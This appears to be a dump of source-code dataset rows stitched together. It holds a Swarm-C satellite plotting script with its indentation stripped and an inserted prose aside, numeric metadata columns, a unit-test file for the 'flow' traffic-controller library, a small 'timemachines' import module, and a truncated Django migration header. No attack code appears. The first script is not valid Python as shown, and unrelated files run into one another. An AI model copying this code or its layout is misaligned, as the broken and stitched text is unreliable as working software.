coords = {'lat': sc_lat, 'lon': sc_lon, 'height': 250.}
cs_new = panel.cs_transform(cs_fr='GEO', cs_to=cs, coords=coords)
data = panel.projection.transform_points(ccrs.PlateCarree(), cs_new['lon'], cs_new['lat'])
x = data[:, 0]
y = data[:, 1]
z = rho_n_sc.flatten()
points = np.array([x, y]).T.reshape(-1, 1, 2)
segments = np.concatenate([points[:-1], points[1:]], axis=1)
norm = plt.Normalize(2e-14, 18e-13)
lc = LineCollection(segments, cmap='gist_ncar', norm=norm)
lc.set_array(z)
lc.set_linewidth(6)
line = panel.major_ax.add_collection(lc)
cbar = plt.gcf().colorbar(line, ax=panel.major_ax, pad=0.1, fraction=0.03)
cbar.set_label('Neutral mass density\n' + r'(kg/m$^{3}$)', rotation=270, labelpad=25)
#cbaxes = plt.gcf().add_axes([0.8, 0.1, 0.03, 0.8])
#cb = plt.colorbar(panel.major_ax, cax = cbaxes)
sectime, dt0 = du.convert_datetime_to_sectime(sc_dt, datetime.datetime(dt_fr.year, dt_fr.month, dt_fr.day))
sectime_res = 10 * 60
time_ticks = np.arange(np.floor(sectime[0]/sectime_res)*sectime_res, np.ceil(sectime[-1]/sectime_res)*sectime_res, sectime_res)
from scipy.interpolate import interp1d
f = interp1d(sectime, x, fill_value='extrapolate')
x_time_ticks = f(time_ticks)
f = interp1d(sectime, y, fill_value='extrapolate')
y_time_ticks = f(time_ticks)
panel.major_ax.plot(x_time_ticks, y_time_ticks, '.', markersize=4, color='k')
for ind, time_tick in enumerate(time_ticks):
time = dt0 + datetime.timedelta(seconds=time_tick)
x_time_tick = x_time_ticks[ind]
y_time_tick = y_time_ticks[ind]
if x_time_tick < panel._extent[0] or x_time_tick > panel._extent[1]:
continue
if y_time_tick < panel._extent[2] or y_time_tick > panel._extent[3]:
continue
panel.major_ax.text( x_time_tick, y_time_tick, time.strftime("%d %H:%M"), fontsize=6)
panel.add_coastlines()
panel.add_grids()
plt.gcf().suptitle('Swarm-C neutral mass density\n 2016-02-03T07:00 - 2016-02-03T07:50')
plt.savefig('test_pho_n_aacgm.png', dpi=300)
# plt.show()
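The along-track coloring above relies on matplotlib's `LineCollection`: consecutive points are paired into two-point segments and a scalar array drives the colormap. A self-contained sketch of just that pattern, using synthetic track data and a non-interactive backend:

```python
import numpy as np
import matplotlib
matplotlib.use("Agg")  # render off-screen; no display needed
import matplotlib.pyplot as plt
from matplotlib.collections import LineCollection

# Synthetic "track" and a scalar measured along it
x = np.linspace(0.0, 2.0 * np.pi, 50)
y = np.sin(x)
z = np.cos(x)

# Pair consecutive points into an (n-1, 2, 2) segment array, as in show_rho_n above
points = np.array([x, y]).T.reshape(-1, 1, 2)
segments = np.concatenate([points[:-1], points[1:]], axis=1)

lc = LineCollection(segments, cmap="gist_ncar", norm=plt.Normalize(z.min(), z.max()))
lc.set_array(z[:-1])  # one color value per segment
lc.set_linewidth(4)

fig, ax = plt.subplots()
line = ax.add_collection(lc)
ax.autoscale()
fig.colorbar(line, ax=ax)
```

Each segment shares its second point with the next segment's first point, which is what makes the colored pieces join into a continuous line.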
def show_n_e(dt_fr, dt_to):
import cdflib
filepath = "~/tmp/SW_OPER_EFIC_LP_1B_20160203T000000_20160203T235959_0501_MDR_EFI_LP.cdf"
cf = cdflib.CDF(filepath)
cf_info = cf.cdf_info()
n_e = cf.varget(variable='Ne')
T_e = cf.varget(variable='Te')
sc_lat = cf.varget(variable='Latitude')
sc_lon = cf.varget(variable='Longitude')
timestamp = cf.varget(variable='Timestamp')
dtstrs = cdflib.cdfepoch.encode(timestamp)
dts = np.empty_like(timestamp, dtype=datetime.datetime)
for ind, dtstr in enumerate(dtstrs):
dts[ind] = datetime.datetime.strptime(dtstr+'000', '%Y-%m-%dT%H:%M:%S.%f')
ind_dt = np.where((dts >= dt_fr) & (dts <= dt_to))[0]
# times = cdflib.cdfepoch.unixtime(timestamp, to_np=True)
sc_lon = sc_lon[ind_dt]
sc_lat = sc_lat[ind_dt]
sc_dt = dts[ind_dt]
rho_n_sc = n_e[ind_dt]
plt.figure(figsize=(8,8))
cs = 'GEO'
panel = PolarMap(
cs='GEO', style='lst-fixed', pole='N', lon_c=None, lst_c=0, mlt_c=None, ut=dt_fr,
boundary_lat=0., proj_type='Stereographic')
# cs = 'AACGM'
#panel = PolarMap(cs=cs, style='mlt-fixed', pole='N', lon_c=None, lst_c=None, mlt_c=0, ut=dt_fr, boundary_lat=30.,
# proj_type='Stereographic')
panel.set_extent(boundary_style='circle')
data = panel.projection.transform_points(ccrs.PlateCarree(), sc_lon, sc_lat)
x = data[:, 0]
y = data[:, 1]
from scipy.stats import linregress
coef = linregress(x, y)
a = coef.slope
b = coef.intercept
# x1 = np.linspace(np.nanmin(x), np.nanmax(x), num=500)
# y1 = np.linspace(np.nanmin(y), np.nanmax(y), num=500)
# x2d, y2d = np.meshgrid(x, y)
# z2d = griddata(data[:, 0:2], rho_n_sc.flatten(), (x2d, y2d), method='nearest')
# z2d_dist = np.abs(a*x2d - y2d + b) / np.sqrt(a**2 + 1)
# z2d = np.where(z2d_dist>1000, np.nan, z2d)
#
# im = panel.major_ax.pcolormesh(x2d, y2d, z2d, vmin=2e-14, vmax=20e-13, cmap='gist_ncar')
# panel.major_ax.plot(sc_lon, sc_lat, transform=ccrs.Geodetic(), linewidth=0.5, color='k')
# plt.colorbar(im)
# xx = np.tile(x, [3, 1])
#
# yy = np.concatenate((y[np.newaxis, :]-150000, y[np.newaxis, :], y[np.newaxis, :]+150000), axis=0)
# zz = np.concatenate((rho_n_sc.T, rho_n_sc.T, rho_n_sc.T), axis=0)
#
# zz = griddata(data[:, 0:2], rho_n_sc.flatten(), (xx, yy), method='nearest')
# im = panel.major_ax.pcolormesh(xx, yy, zz, vmin=2e-14, vmax=20e-13, cmap='gist_ncar')
#
# # panel.major_ax.plot(sc_lon, sc_lat, transform=ccrs.Geodetic(), linewidth=0.5, color='k')
# plt.colorbar(im)
#panel.major_ax.plot(data[:,0], data[:,1], linewidth=3)
from matplotlib.collections import LineCollection
coords = {'lat': sc_lat, 'lon': sc_lon, 'height': 250.}
cs_new = panel.cs_transform(cs_fr='GEO', cs_to=cs, coords=coords)
data = panel.projection.transform_points(ccrs.PlateCarree(), cs_new['lon'], cs_new['lat'])
x = data[:, 0]
y = data[:, 1]
z = rho_n_sc.flatten()
points = np.array([x, y]).T.reshape(-1, 1, 2)
segments = np.concatenate([points[:-1], points[1:]], axis=1)
norm = colors.LogNorm(vmin=8e3, vmax=1e6)
lc = LineCollection(segments, cmap=cm.cmap_gist_ncar_modified(), norm=norm)
lc.set_array(z)
lc.set_linewidth(6)
line = panel.major_ax.add_collection(lc)
cbar = plt.gcf().colorbar(line, ax=panel.major_ax, pad=0.1, fraction=0.03)
cbar.set_label(r'$n_e$' + '\n' + r'(cm$^{-3}$)', rotation=270, labelpad=25)
#cbaxes = plt.gcf().add_axes([0.8, 0.1, 0.03, 0.8])
#cb = plt.colorbar(panel.major_ax, cax = cbaxes)
sectime, dt0 = du.convert_datetime_to_sectime(sc_dt, datetime.datetime(dt_fr.year, dt_fr.month, dt_fr.day))
sectime_res = 10 * 60
time_ticks = np.arange(np.floor(sectime[0]/sectime_res)*sectime_res, np.ceil(sectime[-1]/sectime_res)*sectime_res, sectime_res)
from scipy.interpolate import interp1d
f = interp1d(sectime, x, fill_value='extrapolate')
x_time_ticks = f(time_ticks)
f = interp1d(sectime, y, fill_value='extrapolate')
y_time_ticks = f(time_ticks)
panel.major_ax.plot(x_time_ticks, y_time_ticks, '.', markersize=4, color='k')
for ind, time_tick in enumerate(time_ticks):
time = dt0 + datetime.timedelta(seconds=time_tick)
x_time_tick = x_time_ticks[ind]
y_time_tick = y_time_ticks[ind]
if x_time_tick < panel._extent[0] or x_time_tick > panel._extent[1]:
continue
if y_time_tick < panel._extent[2] or y_time_tick > panel._extent[3]:
continue
panel.major_ax.text( x_time_tick, y_time_tick, time.strftime("%d %H:%M"), fontsize=6)
panel.add_coastlines()
panel.add_gridlines()
plt.gcf().suptitle('Swarm-C electron density\n' + dt_fr.strftime("%Y%m%dT%H%M") + ' - ' + dt_to.strftime("%Y%m%dT%H%M"))
plt.savefig('swarm_ne_' + cs + '_' + dt_fr.strftime("%Y%m%d_%H%M") + '-' + dt_to.strftime('%H%M'), dpi=300)
plt.show()
def show_T_e(dt_fr, dt_to):
import cdflib
filepath = "~/tmp/SW_OPER_EFIC_LP_1B_20160203T000000_20160203T235959_0501_MDR_EFI_LP.cdf"
cf = cdflib.CDF(filepath)
cf_info = cf.cdf_info()
n_e = cf.varget(variable='Ne')
T_e = cf.varget(variable='Te')
sc_lat = cf.varget(variable='Latitude')
sc_lon = cf.varget(variable='Longitude')
timestamp = cf.varget(variable='Timestamp')
dtstrs = cdflib.cdfepoch.encode(timestamp)
dts = np.empty_like(timestamp, dtype=datetime.datetime)
for ind, dtstr in enumerate(dtstrs):
dts[ind] = datetime.datetime.strptime(dtstr+'000', '%Y-%m-%dT%H:%M:%S.%f')
ind_dt = np.where((dts >= dt_fr) & (dts <= dt_to))[0]
# times = cdflib.cdfepoch.unixtime(timestamp, to_np=True)
sc_lon = sc_lon[ind_dt]
sc_lat = sc_lat[ind_dt]
sc_dt = dts[ind_dt]
rho_n_sc = T_e[ind_dt]
plt.figure(figsize=(8,8))
panel = PolarMap(cs='GEO', style='lst-fixed', pole='N', lon_c=None, lst_c=0, mlt_c=None, ut=dt_fr, boundary_lat=0., proj_type='Stereographic')
panel.add_subplot(major=True)
panel.set_extent(boundary_style='circle')
data = panel.projection.transform_points(ccrs.PlateCarree(), sc_lon, sc_lat)
x = data[:, 0]
y = data[:, 1]
from scipy.stats import linregress
coef = linregress(x, y)
a = coef.slope
b = coef.intercept
# x1 = np.linspace(np.nanmin(x), np.nanmax(x), num=500)
# y1 = np.linspace(np.nanmin(y), np.nanmax(y), num=500)
# x2d, y2d = np.meshgrid(x, y)
# z2d = griddata(data[:, 0:2], rho_n_sc.flatten(), (x2d, y2d), method='nearest')
# z2d_dist = np.abs(a*x2d - y2d + b) / np.sqrt(a**2 + 1)
# z2d = np.where(z2d_dist>1000, np.nan, z2d)
#
# im = panel.major_ax.pcolormesh(x2d, y2d, z2d, vmin=2e-14, vmax=20e-13, cmap='gist_ncar')
# panel.major_ax.plot(sc_lon, sc_lat, transform=ccrs.Geodetic(), linewidth=0.5, color='k')
# plt.colorbar(im)
# xx = np.tile(x, [3, 1])
#
# yy = np.concatenate((y[np.newaxis, :]-150000, y[np.newaxis, :], y[np.newaxis, :]+150000), axis=0)
# zz = np.concatenate((rho_n_sc.T, rho_n_sc.T, rho_n_sc.T), axis=0)
#
# zz = griddata(data[:, 0:2], rho_n_sc.flatten(), (xx, yy), method='nearest')
# im = panel.major_ax.pcolormesh(xx, yy, zz, vmin=2e-14, vmax=20e-13, cmap='gist_ncar')
#
# # panel.major_ax.plot(sc_lon, sc_lat, transform=ccrs.Geodetic(), linewidth=0.5, color='k')
# plt.colorbar(im)
#panel.major_ax.plot(data[:,0], data[:,1], linewidth=3)
from matplotlib.collections import LineCollection
data = panel.projection.transform_points(ccrs.PlateCarree(), sc_lon, sc_lat)
x = data[:, 0]
y = data[:, 1]
z = rho_n_sc.flatten()
points = np.array([x, y]).T.reshape(-1, 1, 2)
segments = np.concatenate([points[:-1], points[1:]], axis=1)
norm = plt.Normalize(500, 4000)
# norm = colors.LogNorm(vmin=5e2, vmax=1e6)
lc = LineCollection(segments, cmap='gist_ncar', norm=norm)
lc.set_array(z)
lc.set_linewidth(6)
line = panel.major_ax.add_collection(lc)
cbar = plt.gcf().colorbar(line, ax=panel.major_ax, pad=0.1, fraction=0.03)
cbar.set_label(r'$T_e$' + '\n' + r'(K)', rotation=270, labelpad=25)
#cbaxes = plt.gcf().add_axes([0.8, 0.1, 0.03, 0.8])
#cb = plt.colorbar(panel.major_ax, cax = cbaxes)
sectime, dt0 = du.convert_datetime_to_sectime(sc_dt, datetime.datetime(dt_fr.year, dt_fr.month, dt_fr.day))
sectime_res = 10 * 60
time_ticks = np.arange(np.floor(sectime[0]/sectime_res)*sectime_res, np.ceil(sectime[-1]/sectime_res)*sectime_res, sectime_res)
from scipy.interpolate import interp1d
f = interp1d(sectime, x, fill_value='extrapolate')
x_time_ticks = f(time_ticks)
f = interp1d(sectime, y, fill_value='extrapolate')
y_time_ticks = f(time_ticks)
panel.major_ax.plot(x_time_ticks, y_time_ticks, '.', markersize=4, color='k')
for ind, time_tick in enumerate(time_ticks):
time = dt0 + datetime.timedelta(seconds=time_tick)
x_time_tick = x_time_ticks[ind]
y_time_tick = y_time_ticks[ind]
if x_time_tick < panel._extent[0] or x_time_tick > panel._extent[1]:
continue
if y_time_tick < panel._extent[2] or y_time_tick > panel._extent[3]:
continue
panel.major_ax.text( x_time_tick, y_time_tick, time.strftime("%d %H:%M"), fontsize=6)
panel.add_coastlines()
panel.add_grids()
plt.gcf().suptitle('Swarm-C electron temperature\n 2016-02-03T07:00 - 2016-02-03T07:50')
plt.savefig('test_T_e.png', dpi=300)
plt.show()
if __name__ == "__main__":
dt_fr = datetime.datetime(2016, 2, 3, 0, 40)
dt_to = datetime.datetime(2016, 2, 3, 1, 40)
# show_rho_n(dt_fr, dt_to)
show_n_e(dt_fr, dt_to)
# show_T_e(dt_fr, dt_to) | 40.541667 | 151 | 0.649152 | 2,498 | 15,568 | 3.82546 | 0.119696 | 0.031394 | 0.037673 | 0.020092 | 0.892424 | 0.878924 | 0.864483 | 0.847426 | 0.818753 | 0.806614 | 0 | 0.044354 | 0.183196 | 15,568 | 384 | 152 | 40.541667 | 0.707141 | 0.250771 | 0 | 0.708696 | 0 | 0.008696 | 0.099042 | 0.013125 | 0 | 0 | 0 | 0 | 0 | 1 | 0.017391 | false | 0 | 0.082609 | 0 | 0.104348 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
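Each plotting function above places UT labels by interpolating the projected track coordinates onto a regular time grid. The same idea can be sketched with `np.interp` in place of scipy's `interp1d`; the coordinates below are synthetic stand-ins for the projected x/y returned by `transform_points`.

```python
import numpy as np

# Seconds since the reference time for each track sample (synthetic 50-minute pass)
sectime = np.linspace(0.0, 3000.0, 301)
x = np.cos(sectime / 3000.0 * np.pi)   # stand-ins for projected map coordinates
y = np.sin(sectime / 3000.0 * np.pi)

sectime_res = 10 * 60  # one label every 10 minutes, as in the functions above
time_ticks = np.arange(np.floor(sectime[0] / sectime_res) * sectime_res,
                       np.ceil(sectime[-1] / sectime_res) * sectime_res,
                       sectime_res)

# Coordinates at which to draw each time label along the track
x_time_ticks = np.interp(time_ticks, sectime, x)
y_time_ticks = np.interp(time_ticks, sectime, y)
```

`np.interp` only handles monotonically increasing sample points, which holds here because `sectime` is strictly increasing along the orbit.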
fddda20cbaf80350828fa414f762768a4f2b2d51 | 16,037 | py | Python | tests/test_controllers.py | mark-koren/flow | f3f6d7e9c64f6b641a464a716c7f38ca00388805 | [
"MIT"
] | null | null | null | tests/test_controllers.py | mark-koren/flow | f3f6d7e9c64f6b641a464a716c7f38ca00388805 | [
"MIT"
] | null | null | null | tests/test_controllers.py | mark-koren/flow | f3f6d7e9c64f6b641a464a716c7f38ca00388805 | [
"MIT"
] | null | null | null | import unittest
from flow.core.experiment import SumoExperiment
from flow.core.params import SumoParams, EnvParams, InitialConfig, NetParams
from flow.core.vehicles import Vehicles
from flow.controllers.routing_controllers import ContinuousRouter
from flow.controllers.car_following_models import *
from setup_scripts import ring_road_exp_setup
class TestCFMController(unittest.TestCase):
"""
Tests that the CFM Controller returns mathematically accurate values.
"""
def setUp(self):
# add a few vehicles to the network using the requested model
# also make sure that the input params are what is expected
contr_params = \
{"k_d": 1, "k_v": 1, "k_c": 1, "d_des": 1, "v_des": 8,
"accel_max": 20, "decel_max": -5, "tau": 0, "dt": 0.1, "noise": 0}
vehicles = Vehicles()
vehicles.add_vehicles(
veh_id="test",
acceleration_controller=(CFMController, contr_params),
routing_controller=(ContinuousRouter, {}),
num_vehicles=5
)
# create the environment and scenario classes for a ring road
self.env, scenario = ring_road_exp_setup(vehicles=vehicles)
def tearDown(self):
# terminate the traci instance
self.env.terminate()
# free data used by the class
self.env = None
def test_get_action(self):
self.env.reset()
ids = self.env.vehicles.get_ids()
test_headways = [5, 10, 15, 20, 25]
test_speeds = [5, 10, 5, 10, 5]
for i, veh_id in enumerate(ids):
self.env.vehicles.set_headway(veh_id, test_headways[i])
self.env.vehicles.set_speed(veh_id, test_speeds[i])
requested_accel = [self.env.vehicles.get_acc_controller(
veh_id).get_action(self.env) for veh_id in ids]
expected_accel = [12, 2, 20, 12, 20]
np.testing.assert_array_almost_equal(requested_accel, expected_accel)
class TestBCMController(unittest.TestCase):
"""
Tests that the BCM Controller returns mathematically accurate values.
"""
def setUp(self):
# add a few vehicles to the network using the requested model
# also make sure that the input params are what is expected
contr_params = \
{"k_d": 1, "k_v": 1, "k_c": 1, "d_des": 1, "v_des": 8,
"accel_max": 15, "decel_max": -5, "tau": 0, "dt": 0.1, "noise": 0}
vehicles = Vehicles()
vehicles.add_vehicles(
veh_id="test",
acceleration_controller=(BCMController, contr_params),
routing_controller=(ContinuousRouter, {}),
num_vehicles=5
)
# create the environment and scenario classes for a ring road
self.env, scenario = ring_road_exp_setup(vehicles=vehicles)
def tearDown(self):
# terminate the traci instance
self.env.terminate()
# free data used by the class
self.env = None
def test_get_action(self):
self.env.reset()
ids = self.env.vehicles.get_ids()
test_headways = [5, 10, 15, 20, 25]
test_speeds = [5, 10, 5, 10, 5]
for i, veh_id in enumerate(ids):
self.env.vehicles.set_headway(veh_id, test_headways[i])
self.env.vehicles.set_speed(veh_id, test_speeds[i])
requested_accel = [self.env.vehicles.get_acc_controller(
veh_id).get_action(self.env) for veh_id in ids]
expected_accel = [-12, -7, 15, -7, 13]
np.testing.assert_array_almost_equal(requested_accel, expected_accel)
class TestOVMController(unittest.TestCase):
"""
Tests that the OVM Controller returns mathematically accurate values.
"""
def setUp(self):
# add a few vehicles to the network using the requested model
# also make sure that the input params are what is expected
contr_params = \
{"alpha": 1, "beta": 1, "h_st": 2, "h_go": 15, "v_max": 30,
"accel_max": 15, "decel_max": -5, "tau": 0, "dt": 0.1, "noise": 0}
vehicles = Vehicles()
vehicles.add_vehicles(
veh_id="test",
acceleration_controller=(OVMController, contr_params),
routing_controller=(ContinuousRouter, {}),
num_vehicles=5
)
# create the environment and scenario classes for a ring road
self.env, scenario = ring_road_exp_setup(vehicles=vehicles)
def tearDown(self):
# terminate the traci instance
self.env.terminate()
# free data used by the class
self.env = None
def test_get_action(self):
self.env.reset()
ids = self.env.vehicles.get_ids()
test_headways = [0, 10, 5, 5, 5]
test_speeds = [5, 10, 5, 10, 5]
for i, veh_id in enumerate(ids):
self.env.vehicles.set_headway(veh_id, test_headways[i])
self.env.vehicles.set_speed(veh_id, test_speeds[i])
requested_accel = [self.env.vehicles.get_acc_controller(
veh_id).get_action(self.env) for veh_id in ids]
expected_accel = [0, 5.319073, 3.772339, -5., -1.227661]
np.testing.assert_array_almost_equal(requested_accel, expected_accel)
class TestLinearOVM(unittest.TestCase):
"""
Tests that the Linear OVM Controller returns mathematically accurate
values.
"""
def setUp(self):
# add a few vehicles to the network using the requested model
# also make sure that the input params are what is expected
contr_params = \
{"v_max": 30, "accel_max": 15, "decel_max": -5, "adaptation": 0.65,
"h_st": 5, "tau": 0, "dt": 0.1, "noise": 0}
vehicles = Vehicles()
vehicles.add_vehicles(
veh_id="test",
acceleration_controller=(LinearOVM, contr_params),
routing_controller=(ContinuousRouter, {}),
num_vehicles=5
)
# create the environment and scenario classes for a ring road
self.env, scenario = ring_road_exp_setup(vehicles=vehicles)
def tearDown(self):
# terminate the traci instance
self.env.terminate()
# free data used by the class
self.env = None
def test_get_action(self):
self.env.reset()
ids = self.env.vehicles.get_ids()
test_headways = [5, 10, 10, 15, 0]
test_speeds = [5, 10, 5, 10, 5]
for i, veh_id in enumerate(ids):
self.env.vehicles.set_headway(veh_id, test_headways[i])
self.env.vehicles.set_speed(veh_id, test_speeds[i])
requested_accel = [self.env.vehicles.get_acc_controller(
veh_id).get_action(self.env) for veh_id in ids]
expected_accel = [-5., -2.392308, 5.3, 10.6, -5.]
np.testing.assert_array_almost_equal(requested_accel, expected_accel)
class TestIDMController(unittest.TestCase):
"""
Tests that the IDM Controller returns mathematically accurate values.
"""
def setUp(self):
# add a few vehicles to the network using the requested model
# also make sure that the input params are what is expected
contr_params = {"v0": 30, "T": 1, "a": 1, "b": 1.5, "delta": 4, "s0": 2,
"s1": 0, "decel_max": -5, "dt": 0.1, "noise": 0}
vehicles = Vehicles()
vehicles.add_vehicles(
veh_id="test",
acceleration_controller=(IDMController, contr_params),
routing_controller=(ContinuousRouter, {}),
num_vehicles=5
)
# create the environment and scenario classes for a ring road
self.env, scenario = ring_road_exp_setup(vehicles=vehicles)
def tearDown(self):
# terminate the traci instance
self.env.terminate()
# free data used by the class
self.env = None
def test_get_action(self):
self.env.reset()
ids = self.env.vehicles.get_ids()
test_headways = [10, 20, 30, 40, 50]
test_speeds = [5, 10, 5, 10, 5]
for i, veh_id in enumerate(ids):
self.env.vehicles.set_headway(veh_id, test_headways[i])
self.env.vehicles.set_speed(veh_id, test_speeds[i])
requested_accel = [self.env.vehicles.get_acc_controller(
veh_id).get_action(self.env) for veh_id in ids]
expected_accel = \
[0.959228, -1.638757, 0.994784, 0.331051, 0.979628]
np.testing.assert_array_almost_equal(requested_accel, expected_accel)
# set the perceived headway to zero
test_headways = [0, 0, 0, 0, 0]
for i, veh_id in enumerate(ids):
self.env.vehicles.set_headway(veh_id, test_headways[i])
# make sure the controller doesn't return a ZeroDivisionError when the
# headway is zero
[self.env.vehicles.get_acc_controller(veh_id).get_action(self.env)
for veh_id in ids]
class TestInstantaneousFailsafe(unittest.TestCase):
"""
Tests that the instantaneous failsafe of the base acceleration controller
does not allow vehicles to crash under situations where they otherwise
would. This is tested on two crash-prone controllers: OVM and LinearOVM
"""
def setUp_failsafe(self, vehicles):
additional_env_params = {"target_velocity": 8, "max-deacc": 3,
"max-acc": 3}
env_params = EnvParams(additional_params=additional_env_params,
longitudinal_fail_safe="instantaneous")
additional_net_params = {"length": 100, "lanes": 1, "speed_limit": 30,
"resolution": 40}
net_params = NetParams(additional_params=additional_net_params)
initial_config = InitialConfig(bunching=10)
# create the environment and scenario classes for a ring road
env, scenario = ring_road_exp_setup(vehicles=vehicles,
env_params=env_params,
net_params=net_params,
initial_config=initial_config)
# instantiate an experiment class
self.exp = SumoExperiment(env, scenario)
def tearDown_failsafe(self):
# free data used by the class
self.exp = None
def test_no_crash_OVM(self):
vehicles = Vehicles()
vehicles.add_vehicles(
veh_id="test",
acceleration_controller=(OVMController, {}),
routing_controller=(ContinuousRouter, {}),
num_vehicles=10
)
self.setUp_failsafe(vehicles=vehicles)
# run the experiment, see if it fails
self.exp.run(1, 200)
self.tearDown_failsafe()
def test_no_crash_LinearOVM(self):
vehicles = Vehicles()
vehicles.add_vehicles(
veh_id="test",
acceleration_controller=(LinearOVM, {}),
routing_controller=(ContinuousRouter, {}),
num_vehicles=10
)
self.setUp_failsafe(vehicles=vehicles)
# run the experiment, see if it fails
self.exp.run(1, 200)
self.tearDown_failsafe()
class TestSafeVelocityFailsafe(TestInstantaneousFailsafe):
"""
Tests that the safe velocity failsafe of the base acceleration controller
does not fail under extreme conditions.
"""
def setUp_failsafe(self, vehicles):
additional_env_params = {"target_velocity": 8, "max-deacc": 3,
"max-acc": 3}
env_params = EnvParams(additional_params=additional_env_params,
longitudinal_fail_safe="safe_velocity")
additional_net_params = {"length": 100, "lanes": 1, "speed_limit": 30,
"resolution": 40}
net_params = NetParams(additional_params=additional_net_params)
initial_config = InitialConfig(bunching=10)
# create the environment and scenario classes for a ring road
env, scenario = ring_road_exp_setup(vehicles=vehicles,
env_params=env_params,
net_params=net_params,
initial_config=initial_config)
# instantiate an experiment class
self.exp = SumoExperiment(env, scenario)
class TestStaticLaneChanger(unittest.TestCase):
"""
Makes sure that vehicles with a static lane-changing controller do not
change lanes.
"""
def setUp(self):
# add an extra lane to the ring road network
additional_net_params = {"length": 230, "lanes": 2, "speed_limit": 30,
"resolution": 40}
net_params = NetParams(additional_params=additional_net_params)
# create the environment and scenario classes for a ring road
self.env, scenario = ring_road_exp_setup(net_params=net_params)
def tearDown(self):
# terminate the traci instance
self.env.terminate()
# free data used by the class
self.env = None
def runTest(self):
ids = self.env.vehicles.get_ids()
# run the experiment for a few iterations and collect the lane index
# for vehicles
lanes = [self.env.vehicles.get_lane(veh_id) for veh_id in ids]
for i in range(5):
self.env._step(rl_actions=[])
lanes += [self.env.vehicles.get_lane(veh_id) for veh_id in ids]
# set the timer as very high and reset (the timer used to cause bugs at
# the beginning of a new run for this controller)
self.env.timer = 10000
self.env.reset()
# run the experiment for a few more iterations and collect the lane
# index for vehicles
lanes = [self.env.vehicles.get_lane(veh_id) for veh_id in ids]
for i in range(5):
self.env._step(rl_actions=[])
lanes += [self.env.vehicles.get_lane(veh_id) for veh_id in ids]
# assert that all lane indices are zero
self.assertEqual(sum(np.array(lanes)), 0)
class TestContinuousRouter(unittest.TestCase):
"""
Tests that the continuous router operates properly if there is no need to
reroute, and if there is a need to do so.
"""
def setUp(self):
# create the environment and scenario classes for a ring road
self.env, scenario = ring_road_exp_setup()
def tearDown(self):
# terminate the traci instance
self.env.terminate()
# free data used by the class
self.env = None
def runTest(self):
veh_id = self.env.vehicles.get_ids()[0]
# set the perceived route of the vehicle
self.env.vehicles.set_route(veh_id, ["bottom", "right", "top", "left"])
# set the perceived edge of the vehicle at the beginning of its route
self.env.vehicles.set_edge(veh_id, "bottom")
# assert that the controller is returning a None value
requested_route = self.env.vehicles.get_routing_controller(
veh_id).choose_route(self.env)
self.assertIsNone(requested_route)
# set the perceived edge of the vehicle at the middle of its route
self.env.vehicles.set_edge(veh_id, "right")
# assert that the controller is returning a None value
requested_route = self.env.vehicles.get_routing_controller(
veh_id).choose_route(self.env)
self.assertIsNone(requested_route)
# set the perceived edge of the vehicle at the end of its route
self.env.vehicles.set_edge(veh_id, "left")
# assert that the controller is returning a list of edges starting at
# this link and then containing the route of the link ahead of it
requested_route = self.env.vehicles.get_routing_controller(
veh_id).choose_route(self.env)
expected_route = ["left", "bottom", "right", "top"]
self.assertSequenceEqual(requested_route, expected_route)
if __name__ == '__main__':
unittest.main()
| 35.480088 | 80 | 0.621999 | 2,041 | 16,037 | 4.712396 | 0.136208 | 0.053857 | 0.054585 | 0.03743 | 0.804221 | 0.781659 | 0.774381 | 0.768039 | 0.758474 | 0.751508 | 0 | 0.025999 | 0.285278 | 16,037 | 451 | 81 | 35.558758 | 0.813122 | 0.221176 | 0 | 0.730159 | 0 | 0 | 0.040085 | 0 | 0 | 0 | 0 | 0 | 0.035714 | 1 | 0.103175 | false | 0 | 0.027778 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e310b1c11b7b561bcd3ace50103b82d456e470ea | 247 | py | Python | timemachines/skaters/nproph/allnprophetskaters.py | iklasky/timemachines | 1820fa9453d31d4daaeff75274a935c7455febe3 | [
"MIT"
] | 253 | 2021-01-08T17:33:30.000Z | 2022-03-21T17:32:36.000Z | timemachines/skaters/nproph/allnprophetskaters.py | iklasky/timemachines | 1820fa9453d31d4daaeff75274a935c7455febe3 | [
"MIT"
] | 65 | 2021-01-20T16:43:35.000Z | 2022-03-30T19:07:22.000Z | timemachines/skaters/nproph/allnprophetskaters.py | iklasky/timemachines | 1820fa9453d31d4daaeff75274a935c7455febe3 | [
"MIT"
] | 28 | 2021-02-04T14:58:30.000Z | 2022-01-17T04:35:17.000Z | from timemachines.skaters.nproph.nprophetskaters import NPROPHET_UNIVARIATE_SKATERS
from timemachines.skaters.nproph.nprophskaterscomposed import NPROPHET_SKATERS_COMPOSED
NPROPHET_SKATERS = NPROPHET_UNIVARIATE_SKATERS + NPROPHET_SKATERS_COMPOSED | 61.75 | 87 | 0.91498 | 26 | 247 | 8.346154 | 0.384615 | 0.207373 | 0.211982 | 0.267281 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.052632 | 247 | 4 | 88 | 61.75 | 0.92735 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
477403a44ff39f469ed37fdb99910aa01763e27a | 2,649 | py | Python | channels/migrations/0018_add_post_and_comment_fields.py | mitodl/open-discussions | ab6e9fac70b8a1222a84e78ba778a7a065c20541 | [
"BSD-3-Clause"
] | 12 | 2017-09-27T21:23:27.000Z | 2020-12-25T04:31:30.000Z | channels/migrations/0018_add_post_and_comment_fields.py | mitodl/open-discussions | ab6e9fac70b8a1222a84e78ba778a7a065c20541 | [
